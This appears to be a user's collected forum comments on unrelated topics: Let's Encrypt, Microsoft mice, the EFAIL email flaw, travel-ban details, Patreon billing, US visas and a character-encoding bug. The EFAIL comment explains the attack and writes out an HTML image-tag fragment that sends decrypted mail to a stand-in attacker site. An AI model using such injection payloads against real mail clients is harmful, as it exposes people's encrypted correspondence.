I came to look for a post mentioning the DEC logo, and it turns out to be the frist one. Congrats and good job!

I switched my certs from a commercial CA to Let's Encrypt, and maintenance effort has gone down. With my previous CA, every two years, I'd have to go to the CA's website, put in credit card information, upload CSRs, download certificates, etc. With Let's Encrypt, I install a cron job on my webserver that automatically renews the cert without me having to do a thing. Sure, they expire after 3 months, but since I don't have to spend time renewing them, what do I care?

I don't play fast games, but I think the sensor is great for "office" type work. I had a Logitech MX400 with its laser tracker that would skip on a mousepad, of all things. The BlueTrack sensor in the MS mice tracks smoothly on just about everything I've tried (mousepad, plastic table, glossy wood table). It even works fairly well on a wood table with a sheet of glass over it.

The new 'Classic Intell[i]Mouse' for 2018

The FA mentions at the end that the mouse is available direct from Microsoft, and the MS page gives the part number as HDQ-00001. But that part number is also available from Amazon, which says, "Date First Available: October 16, 2017".

In fact, I have one of them; Amazon tells me that I "purchased this item on March 11, 2018". I like the mouse a lot: it's corded, the BlueTrack sensor works well, and I like the shape. It's a good mouse, but it's not all that new.

P.S. I also like the Microsoft Sculpt Comfort Bluetooth Mouse for a Bluetooth mouse. It's not a miniature "laptop" mouse, but I use it with my laptop... I had a small laptop mouse for a while, but prefer the feel of the larger mouse. Gotta say, MS still makes good mice (and keyboards).

If you don't know the answer to that, maybe you should actually read the description of the flaw?

There are actually two flaws: one is a buggy mail reader application; it should be straightforward to fix the bug. The other is a problem with the spec for encrypting emails (i.e., S/MIME, or whatever the spec for PGP-encrypted email is called).

The mail reader bug is easier to explain: the encrypted email is not 100% encrypted. The contents are encrypted. But MIME messages contain some unencrypted metadata, such as the headers and boundary markers. So the way you inject HTML into an encrypted email is to add a new MIME text/html part before the encrypted part that contains: <img src="http://attackers.website/, and add a new MIME text/html part after the encrypted part that contains: ">. When the buggy mail reader processes the various MIME parts, it decrypts the encrypted part, resulting in HTML plaintext. Now here's the bug: it then joins all the HTML parts into a single HTML document for display, and that results in <img src="http://attackers.website/decrypted content">. So the mail reader app sends an HTTP request to the attacker's website containing the decrypted message in the URL.

The other flaw has to do with a known plaintext attack; if you want to know how that works, RTFA.

Typo: 2017*

Bzzzt! I'm sorry, but that's incorrect. Perhaps it's your post that's the lie? LPRs were banned as part of Trump's first travel ban. The second one (February 1, 2018) added the exemption for LPRs. See this, or basically any article that covered the travel ban. "White House Counsel Don McGahn issued 'authoritative guidance' on Wednesday clarifying that key parts of Trump's controversial executive order, which is aimed at citizens of seven majority-Muslim countries, will no longer cover green card holders ..." and "'They no longer need a waiver because if they are a legal permanent resident they won't need it anymore,' Spicer told reporters during a daily briefing."

What I want to know is why Telegram thinks they should get a 4+ age rating. I think 12+ would be be more appropriate--or even 17+, which I note is what it has on Google Play. Apple wouldn't get on Telegram's case about noods if they didn't claim they were appropriate for kids.

Do they not have title records for cars in the UK? It seems like it'd be a trivial exercise to look up the license plate or the VIN to determine the owner of those cars.

They currently batch all donations into one monthly credit card charge, but this whole discussion is about how they're changing things, not what they currently do. And they will be changing to charge each pledge separately. E.g., if you donate $1 each to 10 creators, your card currently gets charged $10 one time. But after Patreon's change, your card will be charged $1 ten times.

Nope, B-1 visa doesn't cover everything "called business". See the PDF I linked to earlier; it specifically says that if you're coming for a meeting, you're eligible for a B-1 only if you "will receive no salary or income from a U.S based company/entity." Like I said, people who work for a non-US company can enter the US with a B-1 (or under the VWP) to attend a business meeting, but the guy works for the Mozilla Corporation, which is a US (California) company.

Yeah, I suspect it's employment-related. If he were an employee of a foreign company, he could enter via the VWP or on a B-1 to come to a business meeting. But he's an employee of a US company, so I'm pretty sure he needs an actual work visa to come for a business meeting with that company. As the author of cURL, he might be able to get an O-1A (for individuals with an extraordinary ability in the sciences, education, business, or athletics (not including the arts, motion pictures or television industry)). Average Joes could probably get an L-1.

I think the summary and article make it clear that he doesn't have a work visa; he was trying to enter through the visa waiver program. And I agree that the lack of work visa is probably the issue--you can enter through the VWP or on a B-1 business visitor visa to attend a business meeting if you're employed by a foreign company and are not being paid by a US company. But Stenberg's a (presumably paid) employee of Mozilla. IANAIL and all that, but my understanding is that since he's being paid by a US company, coming to the US for a meeting with that company is considered work, and he's no eligible for VWP or a B-1 visa.

Yeah, I remember when Unicode worked, and the abuse that came along with it. If /. wants to filter out non-ASCII characters (or non Latin-1 characters), that's fine, but whatever it's currently doing is broken. There's no case where turning a curly quote into â(TM) is the correct thing to do.

It even seems like the code is trying to do something sensible, but just has a simple bug where it's using the wrong character encoding on its input. The Unicode character "RIGHT SINGLE QUOTATION MARK" is encoded as the bytes E2 80 99 in UTF-8. If you interpret those bytes as if they were Windows codepage 1252 characters, you get â, the Euro sign, then the Trademark symbol. Of those, only â is in Latin-1. It looks like Slashdot is trying to convert non-Latin-1 characters to a Latin-1 equivalent, or remove the character if there's no equivalent. So â makes it through, Euro sign is dropped, and the TM symbol gets turned into "(TM)", and you end up with the curly quote turning into "â(TM)". This is basically what GNU iconv does if you use the "//TRANSLIT" suffix on the the destination encoding, except converting to iso-8859-1//TRANSLIT turns the Euro sign into "EUR".

The code just needs to interpret the input as being UTF-8 instead of CP1252, and it should work a lot better. But it's been broken for years, and nobody there wants to fix it.

NO U

Visa exempt/visa waiver program is distinct from visa on arrival. E.g., Thailand offers visa-free entry for citizens of certain countries, visa on arrival for citizens of other countries, and requires applying for a visa in advance for citizens of yet another set of countries. Travelers who are visa-exempt get a stamp in their passport, but that stamp is not a visa, and may have restrictions compared to an actual visa. E.g., visa-exempt entry to the US cannot be extended, while entry on a tourist visa (and some other non-immigrant visas) can.